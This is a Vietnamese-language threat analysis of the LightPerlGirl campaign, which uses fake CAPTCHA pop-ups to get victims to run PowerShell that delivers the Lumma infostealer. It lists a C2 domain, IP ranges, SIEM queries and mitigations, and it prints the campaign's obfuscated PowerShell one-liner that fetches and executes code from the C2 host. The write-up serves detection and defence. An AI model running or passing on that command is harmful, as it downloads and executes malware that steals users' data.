Chiến dịch Malware LightPerlGirl: Phân tích Kỹ thuật và Biện pháp Khắc phục
Chiến dịch malware LightPerlGirl sử dụng các kỹ thuật social engineering để lừa người dùng thực thi mã độc PowerShell. Dưới đây là phân tích chi tiết về chiến dịch này, bao gồm các TTPs (Tactics, Techniques, and Procedures), cơ sở hạ tầng, IOCs (Indicators of Compromise), payload và các khuyến nghị bảo mật dành cho chuyên viên bảo mật và quản trị hệ thống.
Tổng quan
LightPerlGirl là một chiến dịch malware sử dụng các cửa sổ pop-up CAPTCHA giả mạo nhằm lừa người dùng cài đặt mã độc PowerShell một cách âm thầm. Chiến dịch này khai thác sự thiếu cảnh giác của người dùng để triển khai payload nguy hiểm.
TTPs (MITRE ATT&CK IDs nếu có)
- Social Engineering: Lừa người dùng thực thi malware PowerShell thông qua các cửa sổ pop-up CAPTCHA giả mạo.
- PowerShell Execution: Sử dụng các lệnh
Invoke-RestMethodvàInvoke-Expressiontrong PowerShell để kết nối tới domain C2 và thực thi các lệnh độc hại.
Cơ sở hạ tầng
- C2 Domain: Malware giao tiếp với domain C2 tại
cmbkz8kz1000108k2carjewzf.info. - Địa chỉ IP: Malware sử dụng các dải IP sau:
source.ip: 146.70.115.0/24 or destination.ip: 146.70.115.0/24 source.ip: 91.92.46.0/24 or destination.ip: 91.92.46.0/24 source.ip: 94.74.164.0/24 or destination.ip: 94.74.164.0/24
IOCs (Indicators of Compromise)
Dưới đây là các chỉ số liên quan đến chiến dịch malware LightPerlGirl, có thể được sử dụng trong việc phát hiện và phân tích trên các hệ thống SIEM hoặc TIP:
- DNS Question Name:
dns.question.name : "cmbkz8kz1000108k2carjewzf.info" - Event Code:
event.code : "4104" - Process Name:
process.name: (powershell.exe or cmd.exe or bash) - File Path:
- Malware đặt một URL tại
"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\LixPay.url" - Một tệp batch được đặt tại
"C:\Windows\Temp\LixPay.bat"
- Malware đặt một URL tại
Ví dụ Command-Line
Dưới đây là lệnh được sử dụng trong chiến dịch LightPerlGirl để thực thi mã độc thông qua PowerShell:
@echo off powershell.exe -NoP -W h -c "$VGP = 'cmbkz8kz1000108k2carjewzf.info/?x'; $qVGe = iNvoKE-rEstMeTHOD -urI $Vgp; INVoKe-eXPREsSION $qVGE"Malware Payload
Payload cuối cùng của LightPerlGirl là infostealer Lumma, một loại mã độc chuyên đánh cắp thông tin người dùng.
Khuyến nghị Bảo mật
Để giảm thiểu rủi ro từ chiến dịch LightPerlGirl, các tổ chức và quản trị viên hệ thống nên thực hiện các biện pháp sau:
- Nâng cao nhận thức người dùng: Cảnh báo người dùng về các cửa sổ pop-up CAPTCHA giả mạo và khuyến nghị không thực thi các script từ nguồn không đáng tin cậy.
- Giám sát hệ thống: Theo dõi các hoạt động PowerShell bất thường và các mẫu lưu lượng mạng đáng ngờ trong hệ thống.
- Cập nhật bảo mật: Đảm bảo hệ thống được cập nhật các bản vá bảo mật mới nhất, đặc biệt là các bản vá liên quan đến PowerShell và lỗ hổng Windows SMB client.
Chiến dịch LightPerlGirl là một ví dụ điển hình về việc kẻ tấn công kết hợp social engineering và các kỹ thuật thực thi mã độc để vượt qua các biện pháp bảo vệ thông thường. Việc triển khai các giải pháp giám sát và nâng cao nhận thức là cực kỳ cần thiết để bảo vệ tổ chức khỏi các mối đe dọa tương tự.
